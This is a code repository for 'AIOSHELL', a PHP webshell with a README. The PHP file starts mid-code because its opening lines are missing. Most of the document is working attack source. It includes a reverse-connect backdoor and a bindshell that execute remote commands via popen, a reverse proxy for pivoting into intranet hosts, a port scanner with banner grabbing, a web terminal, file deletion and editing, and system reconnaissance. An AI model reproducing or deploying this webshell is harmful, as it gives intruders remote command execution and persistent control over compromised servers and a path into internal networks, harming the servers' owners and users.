├── README.md
└── webshell.php
/README.md:
--------------------------------------------------------------------------------
1 | ######AIOSHELL
2 | A php webshell run under linux based webservers. v0.05
3 |
4 | by wzt 2014,2015 wzt.wzt@gmail.com
5 |
6 | hmmm, i wrote this php program to prove that i am not only a kernel developer.
7 |
8 | ######FEATURES
9 | 1. system collections based linux system.
10 | 2. connect or bind backdoor use php socket abi, not nc or other binarys.
11 | 3. proxy server to connect intranet server from internet server.
12 | 4. port scanner with Flexible configuration and could display banner information.
13 | 5. comfortable terminal shell.
14 | 6. file and directors operation.
15 |
16 | ######TODO
17 | 1. remote ftp/ssh/mysql passwd crack tool.
18 | 2. mysql mangerment.
19 |
20 | ######SOURCE
21 | https://github.com/cloudsec/aioshell
22 |
--------------------------------------------------------------------------------
/webshell.php:
--------------------------------------------------------------------------------
1 | ';
88 |
89 | $fp=@fopen($file_name, "r");
90 | $data=@fread($fp, filesize($file_name));
91 |
92 | echo '
96 |
97 | ';
98 | }
99 | else {
100 | $fp=@fopen($file_name, "w+");
101 | $result=@fwrite($fp, $_POST['newcontent']);
102 | @fclose($fp);
103 | if ($result == false) {
104 | echo "edit failed.";
105 | }
106 | else {
107 | echo "edit ok.";
108 | }
109 | }
110 |
111 | }
112 |
113 | function rename_file($old_file_name, $new_file_name)
114 | {
115 | if (file_exists($old_file_name) == false) {
116 | echo "file $old_file_name not exist.\n";
117 | return -1;
118 | }
119 |
120 | if (rename($old_file_name, $new_file_name) == false) {
121 | echo "rename $old_file_name to $new_file_name failed.\n";
122 | return -1;
123 | }
124 |
125 | echo "rename $old_file_name to $new_file_name ok.\n";
126 | return 0;
127 | }
128 |
129 | function get_human_size($bytes)
130 | {
131 | $type=array("Bytes", "KB", "MB", "GB", "TB");
132 | $idx=0;
133 |
134 | while ($bytes >= 1024) {
135 | $bytes /= 1024;
136 | $idx++;
137 | }
138 |
139 | return (intval($bytes)." ".$type[$idx]);
140 | }
141 |
142 | function get_file_perms($file_name)
143 | {
144 | return (substr(sprintf('%o', fileperms($file_name)), -4));
145 | }
146 |
147 |
148 | function get_human_file_perms($file_name)
149 | {
150 | $perms = fileperms($file_name);
151 |
152 | if (($perms & 0xC000) == 0xC000) {
153 | $info = 's';
154 | } elseif (($perms & 0xA000) == 0xA000) {
155 | $info = 'l';
156 | } elseif (($perms & 0x8000) == 0x8000) {
157 | $info = '-';
158 | } elseif (($perms & 0x6000) == 0x6000) {
159 | $info = 'b';
160 | } elseif (($perms & 0x4000) == 0x4000) {
161 | $info = 'd';
162 | } elseif (($perms & 0x2000) == 0x2000) {
163 | $info = 'c';
164 | } elseif (($perms & 0x1000) == 0x1000) {
165 | $info = 'p';
166 | } else {
167 | $info = 'u';
168 | }
169 |
170 | $info .= (($perms & 0x0100) ? 'r' : '-');
171 | $info .= (($perms & 0x0080) ? 'w' : '-');
172 | $info .= (($perms & 0x0040) ?
173 | (($perms & 0x0800) ? 's' : 'x' ) :
174 | (($perms & 0x0800) ? 'S' : '-'));
175 |
176 | $info .= (($perms & 0x0020) ? 'r' : '-');
177 | $info .= (($perms & 0x0010) ? 'w' : '-');
178 | $info .= (($perms & 0x0008) ?
179 | (($perms & 0x0400) ? 's' : 'x' ) :
180 | (($perms & 0x0400) ? 'S' : '-'));
181 |
182 | $info .= (($perms & 0x0004) ? 'r' : '-');
183 | $info .= (($perms & 0x0002) ? 'w' : '-');
184 | $info .= (($perms & 0x0001) ?
185 | (($perms & 0x0200) ? 't' : 'x' ) :
186 | (($perms & 0x0200) ? 'T' : '-'));
187 |
188 | return $info;
189 | }
190 |
191 | function get_file_owner($file_name)
192 | {
193 | $uid=fileowner($file_name);
194 | $user_info = posix_getpwuid($uid);
195 |
196 | return $user_info['name'];
197 | }
198 |
199 | function read_dir($dir_path)
200 | {
201 | if (is_dir($dir_path)) {
202 | if (($dp = opendir($dir_path)) == false) {
203 | echo "open $dir_path failed.\n";
204 | return -1;
205 | }
206 | while (($file_name = readdir($dp)) != false) {
207 | if ($file_name == "." || $file_name == "..")
208 | continue;
209 | $sub_path = $dir_path."/".$file_name;
210 | echo "$sub_path\n";
211 | }
212 | }
213 |
214 | closedir($dp);
215 | return 0;
216 | }
217 |
218 | function read_dirs($dir_path)
219 | {
220 | echo '
221 |
222 |
223 | | Filename |
224 | Last modified |
225 | Size |
226 | Chmod/Perms |
227 | Action |
228 |
';
229 |
230 | if (is_dir($dir_path)) {
231 | if (($dp = opendir($dir_path)) == false) {
232 | echo "open $dir_path failed.\n";
233 | return -1;
234 | }
235 | while (($file_name = readdir($dp)) != false) {
236 | if ($file_name == "." || $file_name == "..")
237 | continue;
238 | $sub_path = $dir_path."/".$file_name;
239 | $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
240 | $file_size=filesize($file_name);
241 | $file_size_string=get_human_size($file_size);
242 | $file_perms=get_file_perms($file_name);
243 | $file_perms_string=get_human_file_perms($file_name);
244 | $file_owner=get_file_owner($file_name);
245 |
246 | echo '
247 | | '.$file_name.' |
248 | '.$last_modify_time.' |
249 | '.$file_size_string.' |
250 | '.$file_perms.' / '.$file_perms_string.' / '.$file_owner.' |
251 | Delete
252 | Edit
253 | Download
254 | Rename
255 | |
256 |
';
257 |
258 | }
259 | }
260 |
261 | echo '
';
262 |
263 | closedir($dp);
264 | return 0;
265 | }
266 |
267 | function aio_directory()
268 | {
269 | $curr_path=getcwd();
270 |
271 | return read_dirs($curr_path);
272 | }
273 |
274 |
275 | function search_file_by_name($dir_path, $target_file)
276 | {
277 | if (is_dir($dir_path)) {
278 | if (($dp = opendir($dir_path)) == false) {
279 | echo "open $dir_path failed.\n";
280 | return -1;
281 | }
282 | while (($file_name = readdir($dp)) != false) {
283 | if ($file_name == "." || $file_name == "..")
284 | continue;
285 |
286 | $sub_path = $dir_path."/".$file_name;
287 | if (is_dir($sub_path)) {
288 | search_file_by_name($sub_path, $target_file);
289 | }
290 |
291 | if (!strcmp($file_name, $target_file)) {
292 | echo "found $target_file.\n";
293 | closedir($dp);
294 | return 0;
295 | }
296 | }
297 |
298 | echo "not found $target_file.\n";
299 | closedir($dp);
300 | }
301 |
302 | return -1;
303 | }
304 |
305 | /**
306 | * show file attribute with cetern flag.
307 | *
308 | * @dir_path - directroy to search.
309 | * @attr_flag - 0 readable.
310 | * - 1 writeable.
311 | * - 2 executable.
312 | */
313 | function show_attr_file($dir_path, $attr_flag)
314 | {
315 | if (is_dir($dir_path)) {
316 | if (($dp = opendir($dir_path)) == false) {
317 | echo "open $dir_path failed.\n";
318 | return -1;
319 | }
320 | while (($file_name = readdir($dp)) != false) {
321 | if ($file_name == "." || $file_name == "..")
322 | continue;
323 |
324 | $sub_path = $dir_path."/".$file_name;
325 | if (is_dir($sub_path)) {
326 | show_attr_file($sub_path, $attr_flag);
327 | }
328 |
329 | if ($attr_flag == 0) {
330 | if (is_readable($file_name))
331 | echo "$sub_path\n";
332 | }
333 | else if ($attr_flag == 1) {
334 | if (is_writable($file_name))
335 | echo "$sub_path\n";
336 | }
337 | else if ($attr_flag == 2) {
338 | if (is_executable($file_name))
339 | echo "$sub_path\n";
340 | }
341 | else {
342 | echo "wrong attribute flag.\n";
343 | break;
344 | }
345 | }
346 | closedir($dp);
347 | }
348 |
349 | return 0;
350 | }
351 |
352 | function create_dir($dir_path)
353 | {
354 | if (file_exists($dir_path))
355 | return -1;
356 |
357 | if (mkdir($dir_path, 0700) == false) {
358 | echo "create $dir_path failed.\n";
359 | return -1;
360 | }
361 | echo "create $dir_path ok.\n";
362 | return 0;
363 | }
364 |
365 | function destroy_dir($dir_path)
366 | {
367 | if (file_exists($dir_path) == false)
368 | return -1;
369 |
370 | if (rmdir($dir_path) == false) {
371 | echo "delete $dir_path failed.\n";
372 | return -1;
373 | }
374 |
375 | echo "delete $dir_path ok.\n";
376 | return 0;
377 | }
378 |
379 | function destroy_dirs($dir_path)
380 | {
381 | if (is_dir($dir_path)) {
382 | if (($dp = opendir($dir_path)) == false) {
383 | echo "open $dir_path failed.\n";
384 | return -1;
385 | }
386 | while (($file_name = readdir($dp)) != false) {
387 | if ($file_name == "." || $file_name == "..")
388 | continue;
389 | $sub_path = $dir_path."/".$file_name;
390 |
391 | if (is_dir($sub_path)) {
392 | destroy_dirs($sub_path);
393 | }
394 | else
395 | delete_file($sub_path);
396 | }
397 |
398 | closedir($dp);
399 | destroy_dir($dir_path);
400 | return 0;
401 | }
402 |
403 | return 0;
404 | }
405 |
406 | function linux_id()
407 | {
408 | $uid = posix_getuid();
409 | $user_info = posix_getpwuid($uid);
410 |
411 | echo "uid=".$uid."(".$user_info['name'].") ";
412 | echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
413 | echo "dir=".$user_info['dir']." ";
414 | echo "shell=".$user_info['shell']."\n";
415 | }
416 |
417 | function linux_uname()
418 | {
419 | $uname = posix_uname();
420 |
421 | echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
422 | echo $uname['version']." ".$uname['machine'];
423 | }
424 |
425 | function get_proc_name($file_name)
426 | {
427 | $fp = fopen($file_name, "r");
428 | if ($fp == false) {
429 | echo "open $file_name failed.\n";
430 | return -1;
431 | }
432 |
433 | while (($buf = fgets($fp, 1024)) != false ) {
434 | if (strstr($buf, "Name:") != NULL) {
435 | sscanf($buf, "%s %s", $tmp, $name);
436 | fclose($fp);
437 | return $name;
438 | }
439 | }
440 |
441 | fclose($fp);
442 | return 0;
443 | }
444 |
445 | function get_proc_cmd($file_name)
446 | {
447 | $fp = fopen($file_name, "r");
448 | if ($fp == false) {
449 | echo "open $file_name failed.\n";
450 | return -1;
451 | }
452 |
453 | $cmd = fgets($fp, 1024);
454 | fclose($fp);
455 |
456 | return $cmd;
457 | }
458 |
459 | function linux_ps()
460 | {
461 | if (($dp = opendir("/proc")) == false) {
462 | echo "open /proc failed.\n";
463 | return -1;
464 | }
465 | echo "open /proc ok.\n";
466 |
467 | while (($file_name = readdir($dp)) != false) {
468 | if ($file_name == "." || $file_name == "..")
469 | continue;
470 |
471 | if (ctype_digit($file_name) == false)
472 | continue;
473 |
474 | $dir_path = "/proc/$file_name/status";
475 | $proc_name = get_proc_name($dir_path);
476 |
477 | $dir_path = "/proc/$file_name/cmdline";
478 | $proc_cmd = get_proc_cmd($dir_path);
479 |
480 | echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
481 | }
482 |
483 | closedir($dp);
484 | return 0;
485 | }
486 |
487 | function tcp_connect($host, $port)
488 | {
489 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
490 | if ($socket == false) {
491 | echo "create socket error.\n";
492 | return -1;
493 | }
494 |
495 | if (@socket_connect($socket, $host, $port) == false) {
496 | socket_close($socket);
497 | return -1;
498 | }
499 |
500 | return $socket;
501 | }
502 |
503 | function tcp_connect_timeout($host, $port, $timeout)
504 | {
505 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
506 | if ($socket == false) {
507 | echo "create socket error.\n";
508 | return -1;
509 | }
510 |
511 | if (socket_set_nonblock($socket) == false) {
512 | echo "set nonblock error.\n";
513 | socket_close($socket);
514 | return -1;
515 | }
516 |
517 | $time = time();
518 | while (!@socket_connect($socket, $host, $port)) {
519 | $err = socket_last_error($socket);
520 | if ($err == 115 || $err == 114) {
521 | if ((time() - $time) >= $timeout) {
522 | socket_close($socket);
523 | echo "socket timeout.\n";
524 | return -1;
525 | }
526 | sleep(1);
527 | continue;
528 | }
529 | socket_close($socket);
530 | return -1;
531 | }
532 |
533 | echo "connect to $host:$port ok.\n";
534 | return $socket;
535 | }
536 |
537 | function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
538 | {
539 | $socket1 = tcp_connect($remote_host1, $remote_port1);
540 | if ($socket1 == -1) {
541 | echo "connect to $remote_host1:$remote_port1 failed.\n";
542 | return -1;
543 | }
544 | echo "connect to $remote_host1:$remote_port1 ok.\n";
545 |
546 | $socket2 = tcp_connect($remote_host2, $remote_port2);
547 | if ($socket2 == -1) {
548 | echo "connect to $remote_host2:$remote_port2 failed.\n";
549 | socket_close($socket1);
550 | return -1;
551 | }
552 | echo "connect to $remote_host2:$remote_port2 ok.\n";
553 |
554 | run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
555 |
556 | return 0;
557 | }
558 |
559 | function web_proxy_client()
560 | {
561 | echo '
585 |
586 | Linux reverse proxy
587 |
598 |
599 | ';
600 |
601 | if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
602 | empty($_POST['public_host']) || empty($_POST['public_port']))
603 | return -1;
604 |
605 | run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
606 | $_POST['public_host'], $_POST['public_port']);
607 | }
608 |
609 | function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
610 | {
611 | while (true) {
612 | $read_sockets = array($socket1, $socket2);
613 | $write_sockets = NULL;
614 | $except_sockets = NULL;
615 |
616 | if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
617 | echo "socket_select error ".socket_strerror(socket_last_error())."\n";
618 | break;
619 | }
620 |
621 | if (in_array($socket2, $read_sockets)) {
622 | //echo "got data from $remote_host2.\n";
623 |
624 | $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
625 | if ($bytes2 == false) {
626 | echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
627 | break;
628 | }
629 | //echo "got bytes $bytes2.\n";
630 |
631 | if ($bytes2 == 0) {
632 | echo "recv no data from $remote_host2.\n";
633 | break;
634 | }
635 |
636 | $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
637 | if ($ret2 == false) {
638 | echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
639 | break;
640 | }
641 | if ($ret2 != $bytes2) {
642 | echo "send data failed.\n";
643 | break;
644 | }
645 | //echo "write $ret2 bytes ok.\n";
646 | }
647 | if (in_array($socket1, $read_sockets)) {
648 | //echo "got data from $remote_host1.\n";
649 |
650 | $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
651 | if ($bytes1 == false) {
652 | echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
653 | break;
654 | }
655 | //echo "got bytes $bytes1.\n";
656 |
657 | if ($bytes1 == 0) {
658 | echo "recv no data from $remote_host1.\n";
659 | break;
660 | }
661 |
662 | $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
663 | if ($ret1 == false) {
664 | echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
665 | break;
666 | }
667 | if ($ret1 != $bytes1) {
668 | echo "send data failed.\n";
669 | break;
670 | }
671 | //echo "write $ret1 bytes ok.\n";
672 | }
673 | }
674 |
675 | echo "proxy done.\n";
676 | socket_close($socket1);
677 | socket_close($socket2);
678 |
679 | return 0;
680 | }
681 |
682 | function init_proxy_server($local_port)
683 | {
684 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
685 | if ($socket == false) {
686 | echo "create socket error.\n";
687 | return -1;
688 | }
689 |
690 | if (socket_bind($socket, '0', $local_port) == false) {
691 | echo "bind sock error.\n";
692 | socket_close($socket);
693 | return -1;
694 | }
695 |
696 | if (socket_listen($socket) == false) {
697 | echo "listen sock error.\n";
698 | socket_close($socket);
699 | return -1;
700 | }
701 | echo "listen on port $local_port ok.\n";
702 |
703 | return $socket;
704 | }
705 |
706 |
707 | function run_proxy_server($local_port1, $local_port2)
708 | {
709 | $socket1 = init_proxy_server($local_port1);
710 | if ($socket1 == -1)
711 | return -1;
712 |
713 | while (true) {
714 | if (($newsock1 = socket_accept($socket1)) !== false) {
715 | socket_getpeername($newsock1, $ip1);
716 | echo "got a client form $ip1\n";
717 | break;
718 | }
719 | }
720 | $socket2 = init_proxy_server($local_port2);
721 | if ($socket2 == -1)
722 | return -1;
723 |
724 | while (true) {
725 | if (($newsock2 = socket_accept($socket2)) !== false) {
726 | socket_getpeername($newsock2, $ip2);
727 | echo "got a client form $ip2\n";
728 | break;
729 | }
730 | }
731 |
732 | echo "start transmit data ...\n";
733 | run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
734 |
735 | socket_close($socket2);
736 | socket_close($socket1);
737 |
738 | return 0;
739 | }
740 |
741 | function tcp_connect_port($host, $port, $timeout)
742 | {
743 | $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
744 |
745 | return $fp;
746 | }
747 |
748 | function port_scan_fast($host, $timeout, $banner)
749 | {
750 | $general_ports = array(
751 | '21'=>'FTP',
752 | '22'=>'SSH',
753 | '23'=>'Telnet',
754 | '25'=>'SMTP',
755 | '79'=>'Finger',
756 | '80'=>'HTTP',
757 | '81'=>'HTTP/Proxy',
758 | '110'=>'POP3',
759 | '135'=>'MS Netbios',
760 | '139'=>'MS Netbios',
761 | '143'=>'IMAP',
762 | '162'=>'SNMP',
763 | '389'=>'LDAP',
764 | '443'=>'HTTPS',
765 | '445'=>'MS SMB',
766 | '873'=>'rsync',
767 | '1080'=>'Proxy/HTTP Server',
768 | '1433'=>'MS SQL Server',
769 | '2433'=>'MS SQL Server Hidden',
770 | '1521'=>'Oracle DB Server',
771 | '1522'=>'Oracle DB Server',
772 | '3128'=>'Squid Cache Server',
773 | '3129'=>'Squid Cache Server',
774 | '3306'=>'MySQL Server',
775 | '3307'=>'MySQL Server',
776 | '3500'=>'Squid Cache Server',
777 | '3389'=>'MS Terminal Service',
778 | '5800'=>'VNC Server',
779 | '5900'=>'VNC Server',
780 | '8080'=>'Proxy/HTTP Server',
781 | '10000'=>'Webmin',
782 | '11211'=>'Memcached'
783 | );
784 |
785 | echo '';
786 |
787 | foreach($general_ports as $port=>$name) {
788 | if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
789 | if (empty($banner) == false) {
790 | $data = fgets($fp, 128);
791 | echo '
792 | | '.$host.' |
793 | '.$port.' |
794 | '.$name.' |
795 | '.$data.' |
796 |
';
797 | }
798 | else {
799 | echo '
800 | | '.$host.' |
801 | '.$port.' |
802 | '.$name.' |
803 |
';
804 | }
805 | fclose($fp);
806 | }
807 | }
808 | echo '
';
809 | }
810 |
811 | function port_scan($host, $src_port, $dst_port, $timeout, $banner)
812 | {
813 | echo '
814 |
815 | | Host |
816 | Port |
817 | State |
818 |
';
819 |
820 | for ($port = $src_port; $port <= $dst_port; $port++) {
821 | if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
822 | if (empty($banner) == false) {
823 | $data = fgets($fp, 128);
824 | echo '
825 | | '.$host.' |
826 | '.$port.' |
827 | '.$data.' |
828 |
';
829 | }
830 | else {
831 | echo '
832 | | '.$host.' |
833 | '.$port.' |
834 | OPEN |
835 |
';
836 | }
837 | fclose($fp);
838 | }
839 | }
840 | echo '
';
841 | }
842 |
843 |
844 | function run_portscan()
845 | {
846 | echo '
847 |
848 |
858 |
859 |
860 |
871 |
872 | ';
873 |
874 | if (empty($_POST['scan_host']))
875 | return -1;
876 |
877 | if (isset($_POST['scan_fast'])) {
878 | port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
879 | $_POST['scan_banner']);
880 | }
881 | else {
882 | port_scan($_POST['scan_host'], "1", "65535",
883 | $_POST['scan_timeout'],
884 | $_POST['scan_banner']);
885 | }
886 | }
887 |
888 | function linux_exec($socket, $cmd)
889 | {
890 | $handle = popen($cmd, "r");
891 |
892 | while (($buf = fgets($handle, 1024)) != false) {
893 | $ret = socket_write($socket, $buf, strlen($buf));
894 | if ($ret == false) {
895 | return -1;
896 | }
897 | }
898 |
899 | pclose($handle);
900 | return 0;
901 | }
902 |
903 | function connect_backdoor($host, $port)
904 | {
905 | $banner = "connect back from phpshell\n";
906 |
907 | $socket = tcp_connect($host, $port);
908 | if ($socket == -1) {
909 | echo "connect to $host:$port failed.\n";
910 | return -1;
911 | }
912 | echo "connect to $host:$port ok.\n";
913 |
914 | $ret = socket_write($socket, $banner, strlen($banner));
915 | if ($ret == false) {
916 | echo "write data failed.\n";
917 | socket_close($socket);
918 | return -1;
919 | }
920 |
921 | while (true) {
922 | $buf = socket_read($socket, 1024);
923 | echo $buf;
924 | linux_exec($socket, $buf);
925 | }
926 | }
927 |
928 | function bindshell($local_port)
929 | {
930 | $banner = "bindshell from phpshell\n";
931 |
932 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
933 | if ($socket == false) {
934 | echo "create socket error.\n";
935 | return -1;
936 | }
937 |
938 | if (socket_bind($socket, '0', $local_port) == false) {
939 | echo "bind sock error.\n";
940 | socket_close($socket);
941 | return -1;
942 | }
943 |
944 | if (socket_listen($socket) == false) {
945 | echo "listen sock error.\n";
946 | socket_close($socket);
947 | return -1;
948 | }
949 | echo "listen on port $local_port ok.\n";
950 |
951 | while (true) {
952 | if (($newsock = socket_accept($socket)) !== false) {
953 | socket_getpeername($newsock, $ip);
954 | echo "got a client form $ip"."
";
955 | break;
956 | }
957 | }
958 |
959 | $ret = socket_write($newsock, $banner, strlen($banner));
960 | if ($ret == false) {
961 | echo "write data failed.\n";
962 | socket_close($newsock);
963 | socket_close($socket);
964 | return -1;
965 | }
966 |
967 | while (true) {
968 | $buf = socket_read($newsock, 1024);
969 | echo $buf;
970 | linux_exec($newsock, $buf);
971 | }
972 |
973 | socket_close($newsock);
974 | socket_close($socket);
975 | return 0;
976 | }
977 |
978 | function run_backdoor()
979 | {
980 | echo '
1004 | Linux connect backdoor
1005 |
1012 |
1013 | Linux bindshell backdoor
1014 |
1019 | ';
1020 |
1021 | if ($_POST['target_host'] && $_POST['target_port']) {
1022 | connect_backdoor($_POST['target_host'], $_POST['target_port']);
1023 | }
1024 | if ($_POST['bind_port']) {
1025 | bindshell($_POST['bind_port']);
1026 | }
1027 | }
1028 |
1029 | /*
1030 | function exec_shell($cmd)
1031 | {
1032 | $handle = popen($cmd, "r");
1033 |
1034 | while (($buf = fgets($handle, 1024)) != false) {
1035 | echo $buf;
1036 | }
1037 |
1038 | pclose($handle);
1039 | return 0;
1040 | }
1041 |
1042 | function run_shell()
1043 | {
1044 | $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
1045 | $uid = posix_getuid();
1046 | $user_info = posix_getpwuid($uid);
1047 |
1048 | echo '
1049 |
1050 |
1064 |
1065 |
1066 | ';
1077 | }
1078 | }
1079 | */
1080 |
1081 | function run_terminal_shell($cmd)
1082 | {
1083 | $handle = popen($cmd, "r");
1084 |
1085 | while (($buf = fgets($handle, 1024)) != false) {
1086 | $data .= $buf."";
1087 | }
1088 |
1089 | pclose($handle);
1090 | return $data;
1091 | }
1092 |
1093 | function aio_shell()
1094 | {
1095 | $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
1096 | $uid = posix_getuid();
1097 | $user_info = posix_getpwuid($uid);
1098 | $curr_path = getcwd();
1099 | $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
1100 |
1101 | echo '
1102 |
1103 |
1123 |
1129 |
1130 |
1131 |
1132 |
1133 | | TERMINAL |
1134 | '.$prompt.' |
1135 |
1136 |
1137 |
1154 |
1155 |
1156 | | © wzt 2014 http://www.cloud-sec.org |
1157 |
1158 |
1159 |
1160 | ';
1161 |
1162 | }
1163 |
1164 | function webshell_main()
1165 | {
1166 | if (isset($_GET['cmd'])) {
1167 | if ($_GET['cmd'] == "backdoor") {
1168 | run_backdoor();
1169 | }
1170 | if ($_GET['cmd'] == "shell") {
1171 | aio_shell();
1172 | }
1173 | if ($_GET['cmd'] == "portscan") {
1174 | run_portscan();
1175 | }
1176 | if ($_GET['cmd'] == "proxy") {
1177 | web_proxy_client();
1178 | }
1179 | }
1180 | else {
1181 | echo '
1182 |
1183 |
1184 |
1185 | | show directorys |
1186 | connect backdoor |
1187 | port scan |
1188 | reverse proxy |
1189 | cmd shell |
1190 |
1191 |
1192 | ';
1193 | }
1194 | }
1195 |
1196 | function aio_main()
1197 | {
1198 | $uid = posix_getuid();
1199 | $user_info = posix_getpwuid($uid);
1200 |
1201 | $uid_banner="uid=".$uid."(".$user_info['name'].") ".
1202 | "gid=".$user_info['gid']."(".$user_info['name'].") ".
1203 | "dir=".$user_info['dir']." ".
1204 | "shell=".$user_info['shell'];
1205 |
1206 | $uname = posix_uname();
1207 |
1208 | $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
1209 | $uname['version']." ".$uname['machine'];
1210 |
1211 | $server_addr=$_SERVER['SERVER_NAME'];
1212 | $server_port= $_SERVER['SERVER_PORT'];
1213 |
1214 | $server_time=date("Y/m/d h:i:s",time());
1215 | $phpsoft=$_SERVER['SERVER_SOFTWARE'];
1216 | $php_version=PHP_VERSION;
1217 | $zend_version=zend_version();
1218 | $dis_func=get_cfg_var("disable_functions");
1219 | $safemode=@ini_get('safe_mode');
1220 | if ($safemode == false)
1221 | $safemode="On";
1222 | $cwd_path=getcwd();
1223 | $total_disk=disk_total_space("/");
1224 | $total_disk_gb=intval($total_disk/(1024*1024*1024));
1225 | $free_disk=disk_free_space("/");
1226 | $free_disk_gb=intval($free_disk/(1024*1024*1024));
1227 | echo '
1228 |
1229 |
1310 |
1311 |
1312 |
1313 | PHP AIO SHELL
1314 |
1315 |
1316 |
1317 | | User: '.$uid_banner.' |
1318 | '.$server_time.' |
1319 |
1320 |
1321 | | Uname: '.$uname_banner.' |
1322 | '.$server_addr.":".$server_port.' |
1323 |
1324 |
1325 |
1326 |
1327 | Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
1328 | | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
1329 |
1330 |
1331 |
1332 |
1333 | | Directroy: '.$cwd_path.' |
1334 | Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB |
1335 |
1336 |
1337 |
1338 |
1339 |
1348 |
1349 |
1350 |
1351 | ';
1352 |
1353 | if ($_GET['cmd']) {
1354 | if ($_GET['cmd'] == "dir") {
1355 | aio_directory();
1356 | }
1357 | if ($_GET['cmd'] == "backdoor") {
1358 | run_backdoor();
1359 | }
1360 | if ($_GET['cmd'] == "shell") {
1361 | aio_shell();
1362 | }
1363 | if ($_GET['cmd'] == "portscan") {
1364 | run_portscan();
1365 | }
1366 | if ($_GET['cmd'] == "proxy") {
1367 | web_proxy_client();
1368 | }
1369 | }
1370 |
1371 | if ($_GET['delete']) {
1372 | delete_file($_GET['delete']);
1373 | }
1374 | if ($_GET['edit']) {
1375 | edit_file($_GET['edit']);
1376 | }
1377 | }
1378 |
1379 | aio_main();
1380 | ?>
1381 |
--------------------------------------------------------------------------------